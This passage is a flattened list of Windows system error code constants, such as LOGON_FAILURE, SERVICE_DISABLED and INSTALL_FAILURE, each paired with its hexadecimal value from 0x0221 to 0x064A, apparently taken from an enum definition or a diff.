0x0221 + PORT_MESSAGE_TOO_LONG = 0x0222 + INVALID_QUOTA_LOWER = 0x0223 + DEVICE_ALREADY_ATTACHED = 0x0224 + INSTRUCTION_MISALIGNMENT = 0x0225 + PROFILING_NOT_STARTED = 0x0226 + PROFILING_NOT_STOPPED = 0x0227 + COULD_NOT_INTERPRET = 0x0228 + PROFILING_AT_LIMIT = 0x0229 + CANT_WAIT = 0x022A + CANT_TERMINATE_SELF = 0x022B + UNEXPECTED_MM_CREATE_ERR = 0x022C + UNEXPECTED_MM_MAP_ERROR = 0x022D + UNEXPECTED_MM_EXTEND_ERR = 0x022E + BAD_FUNCTION_TABLE = 0x022F + NO_GUID_TRANSLATION = 0x0230 + INVALID_LDT_SIZE = 0x0231 + INVALID_LDT_OFFSET = 0x0233 + INVALID_LDT_DESCRIPTOR = 0x0234 + TOO_MANY_THREADS = 0x0235 + THREAD_NOT_IN_PROCESS = 0x0236 + PAGEFILE_QUOTA_EXCEEDED = 0x0237 + LOGON_SERVER_CONFLICT = 0x0238 + SYNCHRONIZATION_REQUIRED = 0x0239 + NET_OPEN_FAILED = 0x023A + IO_PRIVILEGE_FAILED = 0x023B + CONTROL_C_EXIT = 0x023C + MISSING_SYSTEMFILE = 0x023D + UNHANDLED_EXCEPTION = 0x023E + APP_INIT_FAILURE = 0x023F + PAGEFILE_CREATE_FAILED = 0x0240 + INVALID_IMAGE_HASH = 0x0241 + NO_PAGEFILE = 0x0242 + ILLEGAL_FLOAT_CONTEXT = 0x0243 + NO_EVENT_PAIR = 0x0244 + DOMAIN_CTRLR_CONFIG_ERROR = 0x0245 + ILLEGAL_CHARACTER = 0x0246 + UNDEFINED_CHARACTER = 0x0247 + FLOPPY_VOLUME = 0x0248 + BIOS_FAILED_TO_CONNECT_INTERRUPT = 0x0249 + BACKUP_CONTROLLER = 0x024A + MUTANT_LIMIT_EXCEEDED = 0x024B + FS_DRIVER_REQUIRED = 0x024C + CANNOT_LOAD_REGISTRY_FILE = 0x024D + DEBUG_ATTACH_FAILED = 0x024E + SYSTEM_PROCESS_TERMINATED = 0x024F + DATA_NOT_ACCEPTED = 0x0250 + VDM_HARD_ERROR = 0x0251 + DRIVER_CANCEL_TIMEOUT = 0x0252 + REPLY_MESSAGE_MISMATCH = 0x0253 + LOST_WRITEBEHIND_DATA = 0x0254 + CLIENT_SERVER_PARAMETERS_INVALID = 0x0255 + NOT_TINY_STREAM = 0x0256 + STACK_OVERFLOW_READ = 0x0257 + CONVERT_TO_LARGE = 0x0258 + FOUND_OUT_OF_SCOPE = 0x0259 + ALLOCATE_BUCKET = 0x025A + MARSHALL_OVERFLOW = 0x025B + INVALID_VARIANT = 0x025C + BAD_COMPRESSION_BUFFER = 0x025D + AUDIT_FAILED = 0x025E + TIMER_RESOLUTION_NOT_SET = 0x025F + INSUFFICIENT_LOGON_INFO = 0x0260 + BAD_DLL_ENTRYPOINT = 0x0261 + BAD_SERVICE_ENTRYPOINT = 0x0262 + IP_ADDRESS_CONFLICT1 = 0x0263 + IP_ADDRESS_CONFLICT2 = 0x0264 + REGISTRY_QUOTA_LIMIT = 0x0265 + NO_CALLBACK_ACTIVE = 0x0266 + PWD_TOO_SHORT = 0x0267 + PWD_TOO_RECENT = 0x0268 + PWD_HISTORY_CONFLICT = 0x0269 + UNSUPPORTED_COMPRESSION = 0x026A + INVALID_HW_PROFILE = 0x026B + INVALID_PLUGPLAY_DEVICE_PATH = 0x026C + QUOTA_LIST_INCONSISTENT = 0x026D + EVALUATION_EXPIRATION = 0x026E + ILLEGAL_DLL_RELOCATION = 0x026F + DLL_INIT_FAILED_LOGOFF = 0x0270 + VALIDATE_CONTINUE = 0x0271 + NO_MORE_MATCHES = 0x0272 + RANGE_LIST_CONFLICT = 0x0273 + SERVER_SID_MISMATCH = 0x0274 + CANT_ENABLE_DENY_ONLY = 0x0275 + FLOAT_MULTIPLE_FAULTS = 0x0276 + FLOAT_MULTIPLE_TRAPS = 0x0277 + NOINTERFACE = 0x0278 + DRIVER_FAILED_SLEEP = 0x0279 + CORRUPT_SYSTEM_FILE = 0x027A + COMMITMENT_MINIMUM = 0x027B + PNP_RESTART_ENUMERATION = 0x027C + SYSTEM_IMAGE_BAD_SIGNATURE = 0x027D + PNP_REBOOT_REQUIRED = 0x027E + INSUFFICIENT_POWER = 0x027F + MULTIPLE_FAULT_VIOLATION = 0x0280 + SYSTEM_SHUTDOWN = 0x0281 + PORT_NOT_SET = 0x0282 + DS_VERSION_CHECK_FAILURE = 0x0283 + RANGE_NOT_FOUND = 0x0284 + NOT_SAFE_MODE_DRIVER = 0x0286 + FAILED_DRIVER_ENTRY = 0x0287 + DEVICE_ENUMERATION_ERROR = 0x0288 + MOUNT_POINT_NOT_RESOLVED = 0x0289 + INVALID_DEVICE_OBJECT_PARAMETER = 0x028A + MCA_OCCURED = 0x028B + DRIVER_DATABASE_ERROR = 0x028C + SYSTEM_HIVE_TOO_LARGE = 0x028D + DRIVER_FAILED_PRIOR_UNLOAD = 0x028E + VOLSNAP_PREPARE_HIBERNATE = 0x028F + HIBERNATION_FAILURE = 0x0290 + FILE_SYSTEM_LIMITATION = 0x0299 + ASSERTION_FAILURE = 0x029C + ACPI_ERROR = 0x029D + WOW_ASSERTION = 0x029E + PNP_BAD_MPS_TABLE = 0x029F + PNP_TRANSLATION_FAILED = 0x02A0 + PNP_IRQ_TRANSLATION_FAILED = 0x02A1 + PNP_INVALID_ID = 0x02A2 + WAKE_SYSTEM_DEBUGGER = 0x02A3 + HANDLES_CLOSED = 0x02A4 + EXTRANEOUS_INFORMATION = 0x02A5 + RXACT_COMMIT_NECESSARY = 0x02A6 + MEDIA_CHECK = 0x02A7 + GUID_SUBSTITUTION_MADE = 0x02A8 + STOPPED_ON_SYMLINK = 0x02A9 + LONGJUMP = 0x02AA + PLUGPLAY_QUERY_VETOED = 0x02AB + UNWIND_CONSOLIDATE = 0x02AC + REGISTRY_HIVE_RECOVERED = 0x02AD + DLL_MIGHT_BE_INSECURE = 0x02AE + DLL_MIGHT_BE_INCOMPATIBLE = 0x02AF + DBG_EXCEPTION_NOT_HANDLED = 0x02B0 + DBG_REPLY_LATER = 0x02B1 + DBG_UNABLE_TO_PROVIDE_HANDLE = 0x02B2 + DBG_TERMINATE_THREAD = 0x02B3 + DBG_TERMINATE_PROCESS = 0x02B4 + DBG_CONTROL_C = 0x02B5 + DBG_PRINTEXCEPTION_C = 0x02B6 + DBG_RIPEXCEPTION = 0x02B7 + DBG_CONTROL_BREAK = 0x02B8 + DBG_COMMAND_EXCEPTION = 0x02B9 + OBJECT_NAME_EXISTS = 0x02BA + THREAD_WAS_SUSPENDED = 0x02BB + IMAGE_NOT_AT_BASE = 0x02BC + RXACT_STATE_CREATED = 0x02BD + SEGMENT_NOTIFICATION = 0x02BE + BAD_CURRENT_DIRECTORY = 0x02BF + FT_READ_RECOVERY_FROM_BACKUP = 0x02C0 + FT_WRITE_RECOVERY = 0x02C1 + IMAGE_MACHINE_TYPE_MISMATCH = 0x02C2 + RECEIVE_PARTIAL = 0x02C3 + RECEIVE_EXPEDITED = 0x02C4 + RECEIVE_PARTIAL_EXPEDITED = 0x02C5 + EVENT_DONE = 0x02C6 + EVENT_PENDING = 0x02C7 + CHECKING_FILE_SYSTEM = 0x02C8 + FATAL_APP_EXIT = 0x02C9 + PREDEFINED_HANDLE = 0x02CA + WAS_UNLOCKED = 0x02CB + SERVICE_NOTIFICATION = 0x02CC + WAS_LOCKED = 0x02CD + LOG_HARD_ERROR = 0x02CE + ALREADY_WIN32 = 0x02CF + IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x02D0 + NO_YIELD_PERFORMED = 0x02D1 + TIMER_RESUME_IGNORED = 0x02D2 + ARBITRATION_UNHANDLED = 0x02D3 + CARDBUS_NOT_SUPPORTED = 0x02D4 + MP_PROCESSOR_MISMATCH = 0x02D5 + HIBERNATED = 0x02D6 + RESUME_HIBERNATION = 0x02D7 + FIRMWARE_UPDATED = 0x02D8 + DRIVERS_LEAKING_LOCKED_PAGES = 0x02D9 + WAKE_SYSTEM = 0x02DA + WAIT_1 = 0x02DB + WAIT_2 = 0x02DC + WAIT_3 = 0x02DD + WAIT_63 = 0x02DE + ABANDONED_WAIT_0 = 0x02DF + ABANDONED_WAIT_63 = 0x02E0 + USER_APC = 0x02E1 + KERNEL_APC = 0x02E2 + ALERTED = 0x02E3 + ELEVATION_REQUIRED = 0x02E4 + REPARSE = 0x02E5 + OPLOCK_BREAK_IN_PROGRESS = 0x02E6 + VOLUME_MOUNTED = 0x02E7 + RXACT_COMMITTED = 0x02E8 + NOTIFY_CLEANUP = 0x02E9 + PRIMARY_TRANSPORT_CONNECT_FAILED = 0x02EA + PAGE_FAULT_TRANSITION = 0x02EB + PAGE_FAULT_DEMAND_ZERO = 0x02EC + PAGE_FAULT_COPY_ON_WRITE = 0x02ED + PAGE_FAULT_GUARD_PAGE = 0x02EE + PAGE_FAULT_PAGING_FILE = 0x02EF + CACHE_PAGE_LOCKED = 0x02F0 + CRASH_DUMP = 0x02F1 + BUFFER_ALL_ZEROS = 0x02F2 + REPARSE_OBJECT = 0x02F3 + RESOURCE_REQUIREMENTS_CHANGED = 0x02F4 + TRANSLATION_COMPLETE = 0x02F5 + NOTHING_TO_TERMINATE = 0x02F6 + PROCESS_NOT_IN_JOB = 0x02F7 + PROCESS_IN_JOB = 0x02F8 + VOLSNAP_HIBERNATE_READY = 0x02F9 + FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x02FA + INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x02FB + INTERRUPT_STILL_CONNECTED = 0x02FC + WAIT_FOR_OPLOCK = 0x02FD + DBG_EXCEPTION_HANDLED = 0x02FE + DBG_CONTINUE = 0x02FF + CALLBACK_POP_STACK = 0x0300 + COMPRESSION_DISABLED = 0x0301 + CANTFETCHBACKWARDS = 0x0302 + CANTSCROLLBACKWARDS = 0x0303 + ROWSNOTRELEASED = 0x0304 + BAD_ACCESSOR_FLAGS = 0x0305 + ERRORS_ENCOUNTERED = 0x0306 + NOT_CAPABLE = 0x0307 + REQUEST_OUT_OF_SEQUENCE = 0x0308 + VERSION_PARSE_ERROR = 0x0309 + BADSTARTPOSITION = 0x030A + MEMORY_HARDWARE = 0x030B + DISK_REPAIR_DISABLED = 0x030C + INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0x030D + SYSTEM_POWERSTATE_TRANSITION = 0x030E + SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x030F + MCA_EXCEPTION = 0x0310 + ACCESS_AUDIT_BY_POLICY = 0x0311 + ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0x0312 + ABANDON_HIBERFILE = 0x0313 + LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0x0314 + LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0x0315 + LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0x0316 + BAD_MCFG_TABLE = 0x0317 + OPLOCK_SWITCHED_TO_NEW_HANDLE = 0x0320 + CANNOT_GRANT_REQUESTED_OPLOCK = 0x0321 + CANNOT_BREAK_OPLOCK = 0x0322 + OPLOCK_HANDLE_CLOSED = 0x0323 + NO_ACE_CONDITION = 0x0324 + INVALID_ACE_CONDITION = 0x0325 + EA_ACCESS_DENIED = 0x03E2 + OPERATION_ABORTED = 0x03E3 + IO_INCOMPLETE = 0x03E4 + IO_PENDING = 0x03E5 + NOACCESS = 0x03E6 + SWAPERROR = 0x03E7 + STACK_OVERFLOW = 0x03E9 + INVALID_MESSAGE = 0x03EA + CAN_NOT_COMPLETE = 0x03EB + INVALID_FLAGS = 0x03EC + UNRECOGNIZED_VOLUME = 0x03ED + FILE_INVALID = 0x03EE + FULLSCREEN_MODE = 0x03EF + NO_TOKEN = 0x03F0 + BADDB = 0x03F1 + BADKEY = 0x03F2 + CANTOPEN = 0x03F3 + CANTREAD = 0x03F4 + CANTWRITE = 0x03F5 + REGISTRY_RECOVERED = 0x03F6 + REGISTRY_CORRUPT = 0x03F7 + REGISTRY_IO_FAILED = 0x03F8 + NOT_REGISTRY_FILE = 0x03F9 + KEY_DELETED = 0x03FA + NO_LOG_SPACE = 0x03FB + KEY_HAS_CHILDREN = 0x03FC + CHILD_MUST_BE_VOLATILE = 0x03FD + NOTIFY_ENUM_DIR = 0x03FE + DEPENDENT_SERVICES_RUNNING = 0x041B + INVALID_SERVICE_CONTROL = 0x041C + SERVICE_REQUEST_TIMEOUT = 0x041D + SERVICE_NO_THREAD = 0x041E + SERVICE_DATABASE_LOCKED = 0x041F + SERVICE_ALREADY_RUNNING = 0x0420 + INVALID_SERVICE_ACCOUNT = 0x0421 + SERVICE_DISABLED = 0x0422 + CIRCULAR_DEPENDENCY = 0x0423 + SERVICE_DOES_NOT_EXIST = 0x0424 + SERVICE_CANNOT_ACCEPT_CTRL = 0x0425 + SERVICE_NOT_ACTIVE = 0x0426 + FAILED_SERVICE_CONTROLLER_CONNECT = 0x0427 + EXCEPTION_IN_SERVICE = 0x0428 + DATABASE_DOES_NOT_EXIST = 0x0429 + SERVICE_SPECIFIC_ERROR = 0x042A + PROCESS_ABORTED = 0x042B + SERVICE_DEPENDENCY_FAIL = 0x042C + SERVICE_LOGON_FAILED = 0x042D + SERVICE_START_HANG = 0x042E + INVALID_SERVICE_LOCK = 0x042F + SERVICE_MARKED_FOR_DELETE = 0x0430 + SERVICE_EXISTS = 0x0431 + ALREADY_RUNNING_LKG = 0x0432 + SERVICE_DEPENDENCY_DELETED = 0x0433 + BOOT_ALREADY_ACCEPTED = 0x0434 + SERVICE_NEVER_STARTED = 0x0435 + DUPLICATE_SERVICE_NAME = 0x0436 + DIFFERENT_SERVICE_ACCOUNT = 0x0437 + CANNOT_DETECT_DRIVER_FAILURE = 0x0438 + CANNOT_DETECT_PROCESS_ABORT = 0x0439 + NO_RECOVERY_PROGRAM = 0x043A + SERVICE_NOT_IN_EXE = 0x043B + NOT_SAFEBOOT_SERVICE = 0x043C + END_OF_MEDIA = 0x044C + FILEMARK_DETECTED = 0x044D + BEGINNING_OF_MEDIA = 0x044E + SETMARK_DETECTED = 0x044F + NO_DATA_DETECTED = 0x0450 + PARTITION_FAILURE = 0x0451 + INVALID_BLOCK_LENGTH = 0x0452 + DEVICE_NOT_PARTITIONED = 0x0453 + UNABLE_TO_LOCK_MEDIA = 0x0454 + UNABLE_TO_UNLOAD_MEDIA = 0x0455 + MEDIA_CHANGED = 0x0456 + BUS_RESET = 0x0457 + NO_MEDIA_IN_DRIVE = 0x0458 + NO_UNICODE_TRANSLATION = 0x0459 + DLL_INIT_FAILED = 0x045A + SHUTDOWN_IN_PROGRESS = 0x045B + NO_SHUTDOWN_IN_PROGRESS = 0x045C + IO_DEVICE = 0x045D + SERIAL_NO_DEVICE = 0x045E + IRQ_BUSY = 0x045F + MORE_WRITES = 0x0460 + COUNTER_TIMEOUT = 0x0461 + FLOPPY_ID_MARK_NOT_FOUND = 0x0462 + FLOPPY_WRONG_CYLINDER = 0x0463 + FLOPPY_UNKNOWN_ERROR = 0x0464 + FLOPPY_BAD_REGISTERS = 0x0465 + DISK_RECALIBRATE_FAILED = 0x0466 + DISK_OPERATION_FAILED = 0x0467 + DISK_RESET_FAILED = 0x0468 + EOM_OVERFLOW = 0x0469 + NOT_ENOUGH_SERVER_MEMORY = 0x046A + POSSIBLE_DEADLOCK = 0x046B + MAPPED_ALIGNMENT = 0x046C + SET_POWER_STATE_VETOED = 0x0474 + SET_POWER_STATE_FAILED = 0x0475 + TOO_MANY_LINKS = 0x0476 + OLD_WIN_VERSION = 0x047E + APP_WRONG_OS = 0x047F + SINGLE_INSTANCE_APP = 0x0480 + RMODE_APP = 0x0481 + INVALID_DLL = 0x0482 + NO_ASSOCIATION = 0x0483 + DDE_FAIL = 0x0484 + DLL_NOT_FOUND = 0x0485 + NO_MORE_USER_HANDLES = 0x0486 + MESSAGE_SYNC_ONLY = 0x0487 + SOURCE_ELEMENT_EMPTY = 0x0488 + DESTINATION_ELEMENT_FULL = 0x0489 + ILLEGAL_ELEMENT_ADDRESS = 0x048A + MAGAZINE_NOT_PRESENT = 0x048B + DEVICE_REINITIALIZATION_NEEDED = 0x048C + DEVICE_REQUIRES_CLEANING = 0x048D + DEVICE_DOOR_OPEN = 0x048E + DEVICE_NOT_CONNECTED = 0x048F + NOT_FOUND = 0x0490 + NO_MATCH = 0x0491 + SET_NOT_FOUND = 0x0492 + POINT_NOT_FOUND = 0x0493 + NO_TRACKING_SERVICE = 0x0494 + NO_VOLUME_ID = 0x0495 + UNABLE_TO_REMOVE_REPLACED = 0x0497 + UNABLE_TO_MOVE_REPLACEMENT = 0x0498 + UNABLE_TO_MOVE_REPLACEMENT_2 = 0x0499 + JOURNAL_DELETE_IN_PROGRESS = 0x049A + JOURNAL_NOT_ACTIVE = 0x049B + POTENTIAL_FILE_FOUND = 0x049C + JOURNAL_ENTRY_DELETED = 0x049D + SHUTDOWN_IS_SCHEDULED = 0x04A6 + SHUTDOWN_USERS_LOGGED_ON = 0x04A7 + BAD_DEVICE = 0x04B0 + CONNECTION_UNAVAIL = 0x04B1 + DEVICE_ALREADY_REMEMBERED = 0x04B2 + NO_NET_OR_BAD_PATH = 0x04B3 + BAD_PROVIDER = 0x04B4 + CANNOT_OPEN_PROFILE = 0x04B5 + BAD_PROFILE = 0x04B6 + NOT_CONTAINER = 0x04B7 + EXTENDED_ERROR = 0x04B8 + INVALID_GROUPNAME = 0x04B9 + INVALID_COMPUTERNAME = 0x04BA + INVALID_EVENTNAME = 0x04BB + INVALID_DOMAINNAME = 0x04BC + INVALID_SERVICENAME = 0x04BD + INVALID_NETNAME = 0x04BE + INVALID_SHARENAME = 0x04BF + INVALID_PASSWORDNAME = 0x04C0 + INVALID_MESSAGENAME = 0x04C1 + INVALID_MESSAGEDEST = 0x04C2 + SESSION_CREDENTIAL_CONFLICT = 0x04C3 + REMOTE_SESSION_LIMIT_EXCEEDED = 0x04C4 + DUP_DOMAINNAME = 0x04C5 + NO_NETWORK = 0x04C6 + CANCELLED = 0x04C7 + USER_MAPPED_FILE = 0x04C8 + CONNECTION_REFUSED = 0x04C9 + GRACEFUL_DISCONNECT = 0x04CA + ADDRESS_ALREADY_ASSOCIATED = 0x04CB + ADDRESS_NOT_ASSOCIATED = 0x04CC + CONNECTION_INVALID = 0x04CD + CONNECTION_ACTIVE = 0x04CE + NETWORK_UNREACHABLE = 0x04CF + HOST_UNREACHABLE = 0x04D0 + PROTOCOL_UNREACHABLE = 0x04D1 + PORT_UNREACHABLE = 0x04D2 + REQUEST_ABORTED = 0x04D3 + CONNECTION_ABORTED = 0x04D4 + RETRY = 0x04D5 + CONNECTION_COUNT_LIMIT = 0x04D6 + LOGIN_TIME_RESTRICTION = 0x04D7 + LOGIN_WKSTA_RESTRICTION = 0x04D8 + INCORRECT_ADDRESS = 0x04D9 + ALREADY_REGISTERED = 0x04DA + SERVICE_NOT_FOUND = 0x04DB + NOT_AUTHENTICATED = 0x04DC + NOT_LOGGED_ON = 0x04DD + CONTINUE = 0x04DE + ALREADY_INITIALIZED = 0x04DF + NO_MORE_DEVICES = 0x04E0 + NO_SUCH_SITE = 0x04E1 + DOMAIN_CONTROLLER_EXISTS = 0x04E2 + ONLY_IF_CONNECTED = 0x04E3 + OVERRIDE_NOCHANGES = 0x04E4 + BAD_USER_PROFILE = 0x04E5 + NOT_SUPPORTED_ON_SBS = 0x04E6 + SERVER_SHUTDOWN_IN_PROGRESS = 0x04E7 + HOST_DOWN = 0x04E8 + NON_ACCOUNT_SID = 0x04E9 + NON_DOMAIN_SID = 0x04EA + APPHELP_BLOCK = 0x04EB + ACCESS_DISABLED_BY_POLICY = 0x04EC + REG_NAT_CONSUMPTION = 0x04ED + CSCSHARE_OFFLINE = 0x04EE + PKINIT_FAILURE = 0x04EF + SMARTCARD_SUBSYSTEM_FAILURE = 0x04F0 + DOWNGRADE_DETECTED = 0x04F1 + MACHINE_LOCKED = 0x04F7 + CALLBACK_SUPPLIED_INVALID_DATA = 0x04F9 + SYNC_FOREGROUND_REFRESH_REQUIRED = 0x04FA + DRIVER_BLOCKED = 0x04FB + INVALID_IMPORT_OF_NON_DLL = 0x04FC + ACCESS_DISABLED_WEBBLADE = 0x04FD + ACCESS_DISABLED_WEBBLADE_TAMPER = 0x04FE + RECOVERY_FAILURE = 0x04FF + ALREADY_FIBER = 0x0500 + ALREADY_THREAD = 0x0501 + STACK_BUFFER_OVERRUN = 0x0502 + PARAMETER_QUOTA_EXCEEDED = 0x0503 + DEBUGGER_INACTIVE = 0x0504 + DELAY_LOAD_FAILED = 0x0505 + VDM_DISALLOWED = 0x0506 + UNIDENTIFIED_ERROR = 0x0507 + INVALID_CRUNTIME_PARAMETER = 0x0508 + BEYOND_VDL = 0x0509 + INCOMPATIBLE_SERVICE_SID_TYPE = 0x050A + DRIVER_PROCESS_TERMINATED = 0x050B + IMPLEMENTATION_LIMIT = 0x050C + PROCESS_IS_PROTECTED = 0x050D + SERVICE_NOTIFY_CLIENT_LAGGING = 0x050E + DISK_QUOTA_EXCEEDED = 0x050F + CONTENT_BLOCKED = 0x0510 + INCOMPATIBLE_SERVICE_PRIVILEGE = 0x0511 + INVALID_LABEL = 0x0513 + NOT_ALL_ASSIGNED = 0x0514 + SOME_NOT_MAPPED = 0x0515 + NO_QUOTAS_FOR_ACCOUNT = 0x0516 + LOCAL_USER_SESSION_KEY = 0x0517 + NULL_LM_PASSWORD = 0x0518 + UNKNOWN_REVISION = 0x0519 + REVISION_MISMATCH = 0x051A + INVALID_OWNER = 0x051B + INVALID_PRIMARY_GROUP = 0x051C + NO_IMPERSONATION_TOKEN = 0x051D + CANT_DISABLE_MANDATORY = 0x051E + NO_LOGON_SERVERS = 0x051F + NO_SUCH_LOGON_SESSION = 0x0520 + NO_SUCH_PRIVILEGE = 0x0521 + PRIVILEGE_NOT_HELD = 0x0522 + INVALID_ACCOUNT_NAME = 0x0523 + USER_EXISTS = 0x0524 + NO_SUCH_USER = 0x0525 + GROUP_EXISTS = 0x0526 + NO_SUCH_GROUP = 0x0527 + MEMBER_IN_GROUP = 0x0528 + MEMBER_NOT_IN_GROUP = 0x0529 + LAST_ADMIN = 0x052A + WRONG_PASSWORD = 0x052B + ILL_FORMED_PASSWORD = 0x052C + PASSWORD_RESTRICTION = 0x052D + LOGON_FAILURE = 0x052E + ACCOUNT_RESTRICTION = 0x052F + INVALID_LOGON_HOURS = 0x0530 + INVALID_WORKSTATION = 0x0531 + PASSWORD_EXPIRED = 0x0532 + ACCOUNT_DISABLED = 0x0533 + NONE_MAPPED = 0x0534 + TOO_MANY_LUIDS_REQUESTED = 0x0535 + LUIDS_EXHAUSTED = 0x0536 + INVALID_SUB_AUTHORITY = 0x0537 + INVALID_ACL = 0x0538 + INVALID_SID = 0x0539 + INVALID_SECURITY_DESCR = 0x053A + BAD_INHERITANCE_ACL = 0x053C + SERVER_DISABLED = 0x053D + SERVER_NOT_DISABLED = 0x053E + INVALID_ID_AUTHORITY = 0x053F + ALLOTTED_SPACE_EXCEEDED = 0x0540 + INVALID_GROUP_ATTRIBUTES = 0x0541 + BAD_IMPERSONATION_LEVEL = 0x0542 + CANT_OPEN_ANONYMOUS = 0x0543 + BAD_VALIDATION_CLASS = 0x0544 + BAD_TOKEN_TYPE = 0x0545 + NO_SECURITY_ON_OBJECT = 0x0546 + CANT_ACCESS_DOMAIN_INFO = 0x0547 + INVALID_SERVER_STATE = 0x0548 + INVALID_DOMAIN_STATE = 0x0549 + INVALID_DOMAIN_ROLE = 0x054A + NO_SUCH_DOMAIN = 0x054B + DOMAIN_EXISTS = 0x054C + DOMAIN_LIMIT_EXCEEDED = 0x054D + INTERNAL_DB_CORRUPTION = 0x054E + INTERNAL_ERROR = 0x054F + GENERIC_NOT_MAPPED = 0x0550 + BAD_DESCRIPTOR_FORMAT = 0x0551 + NOT_LOGON_PROCESS = 0x0552 + LOGON_SESSION_EXISTS = 0x0553 + NO_SUCH_PACKAGE = 0x0554 + BAD_LOGON_SESSION_STATE = 0x0555 + LOGON_SESSION_COLLISION = 0x0556 + INVALID_LOGON_TYPE = 0x0557 + CANNOT_IMPERSONATE = 0x0558 + RXACT_INVALID_STATE = 0x0559 + RXACT_COMMIT_FAILURE = 0x055A + SPECIAL_ACCOUNT = 0x055B + SPECIAL_GROUP = 0x055C + SPECIAL_USER = 0x055D + MEMBERS_PRIMARY_GROUP = 0x055E + TOKEN_ALREADY_IN_USE = 0x055F + NO_SUCH_ALIAS = 0x0560 + MEMBER_NOT_IN_ALIAS = 0x0561 + MEMBER_IN_ALIAS = 0x0562 + ALIAS_EXISTS = 0x0563 + LOGON_NOT_GRANTED = 0x0564 + TOO_MANY_SECRETS = 0x0565 + SECRET_TOO_LONG = 0x0566 + INTERNAL_DB_ERROR = 0x0567 + TOO_MANY_CONTEXT_IDS = 0x0568 + LOGON_TYPE_NOT_GRANTED = 0x0569 + NT_CROSS_ENCRYPTION_REQUIRED = 0x056A + NO_SUCH_MEMBER = 0x056B + INVALID_MEMBER = 0x056C + TOO_MANY_SIDS = 0x056D + LM_CROSS_ENCRYPTION_REQUIRED = 0x056E + NO_INHERITANCE = 0x056F + FILE_CORRUPT = 0x0570 + DISK_CORRUPT = 0x0571 + NO_USER_SESSION_KEY = 0x0572 + LICENSE_QUOTA_EXCEEDED = 0x0573 + WRONG_TARGET_NAME = 0x0574 + MUTUAL_AUTH_FAILED = 0x0575 + TIME_SKEW = 0x0576 + CURRENT_DOMAIN_NOT_ALLOWED = 0x0577 + INVALID_WINDOW_HANDLE = 0x0578 + INVALID_MENU_HANDLE = 0x0579 + INVALID_CURSOR_HANDLE = 0x057A + INVALID_ACCEL_HANDLE = 0x057B + INVALID_HOOK_HANDLE = 0x057C + INVALID_DWP_HANDLE = 0x057D + TLW_WITH_WSCHILD = 0x057E + CANNOT_FIND_WND_CLASS = 0x057F + WINDOW_OF_OTHER_THREAD = 0x0580 + HOTKEY_ALREADY_REGISTERED = 0x0581 + CLASS_ALREADY_EXISTS = 0x0582 + CLASS_DOES_NOT_EXIST = 0x0583 + CLASS_HAS_WINDOWS = 0x0584 + INVALID_INDEX = 0x0585 + INVALID_ICON_HANDLE = 0x0586 + PRIVATE_DIALOG_INDEX = 0x0587 + LISTBOX_ID_NOT_FOUND = 0x0588 + NO_WILDCARD_CHARACTERS = 0x0589 + CLIPBOARD_NOT_OPEN = 0x058A + HOTKEY_NOT_REGISTERED = 0x058B + WINDOW_NOT_DIALOG = 0x058C + CONTROL_ID_NOT_FOUND = 0x058D + INVALID_COMBOBOX_MESSAGE = 0x058E + WINDOW_NOT_COMBOBOX = 0x058F + INVALID_EDIT_HEIGHT = 0x0590 + DC_NOT_FOUND = 0x0591 + INVALID_HOOK_FILTER = 0x0592 + INVALID_FILTER_PROC = 0x0593 + HOOK_NEEDS_HMOD = 0x0594 + GLOBAL_ONLY_HOOK = 0x0595 + JOURNAL_HOOK_SET = 0x0596 + HOOK_NOT_INSTALLED = 0x0597 + INVALID_LB_MESSAGE = 0x0598 + SETCOUNT_ON_BAD_LB = 0x0599 + LB_WITHOUT_TABSTOPS = 0x059A + DESTROY_OBJECT_OF_OTHER_THREAD = 0x059B + CHILD_WINDOW_MENU = 0x059C + NO_SYSTEM_MENU = 0x059D + INVALID_MSGBOX_STYLE = 0x059E + INVALID_SPI_VALUE = 0x059F + SCREEN_ALREADY_LOCKED = 0x05A0 + HWNDS_HAVE_DIFF_PARENT = 0x05A1 + NOT_CHILD_WINDOW = 0x05A2 + INVALID_GW_COMMAND = 0x05A3 + INVALID_THREAD_ID = 0x05A4 + NON_MDICHILD_WINDOW = 0x05A5 + POPUP_ALREADY_ACTIVE = 0x05A6 + NO_SCROLLBARS = 0x05A7 + INVALID_SCROLLBAR_RANGE = 0x05A8 + INVALID_SHOWWIN_COMMAND = 0x05A9 + NO_SYSTEM_RESOURCES = 0x05AA + NONPAGED_SYSTEM_RESOURCES = 0x05AB + PAGED_SYSTEM_RESOURCES = 0x05AC + WORKING_SET_QUOTA = 0x05AD + PAGEFILE_QUOTA = 0x05AE + COMMITMENT_LIMIT = 0x05AF + MENU_ITEM_NOT_FOUND = 0x05B0 + INVALID_KEYBOARD_HANDLE = 0x05B1 + HOOK_TYPE_NOT_ALLOWED = 0x05B2 + REQUIRES_INTERACTIVE_WINDOWSTATION = 0x05B3 + TIMEOUT = 0x05B4 + INVALID_MONITOR_HANDLE = 0x05B5 + INCORRECT_SIZE = 0x05B6 + SYMLINK_CLASS_DISABLED = 0x05B7 + SYMLINK_NOT_SUPPORTED = 0x05B8 + XML_PARSE_ERROR = 0x05B9 + XMLDSIG_ERROR = 0x05BA + RESTART_APPLICATION = 0x05BB + WRONG_COMPARTMENT = 0x05BC + AUTHIP_FAILURE = 0x05BD + NO_NVRAM_RESOURCES = 0x05BE + EVENTLOG_FILE_CORRUPT = 0x05DC + EVENTLOG_CANT_START = 0x05DD + LOG_FILE_FULL = 0x05DE + EVENTLOG_FILE_CHANGED = 0x05DF + INVALID_TASK_NAME = 0x060E + INVALID_TASK_INDEX = 0x060F + THREAD_ALREADY_IN_TASK = 0x0610 + INSTALL_SERVICE_FAILURE = 0x0641 + INSTALL_USEREXIT = 0x0642 + INSTALL_FAILURE = 0x0643 + INSTALL_SUSPEND = 0x0644 + UNKNOWN_PRODUCT = 0x0645 + UNKNOWN_FEATURE = 0x0646 + UNKNOWN_COMPONENT = 0x0647 + UNKNOWN_PROPERTY = 0x0648 + INVALID_HANDLE_STATE = 0x0649 + BAD_CONFIGURATION = 0x064A + 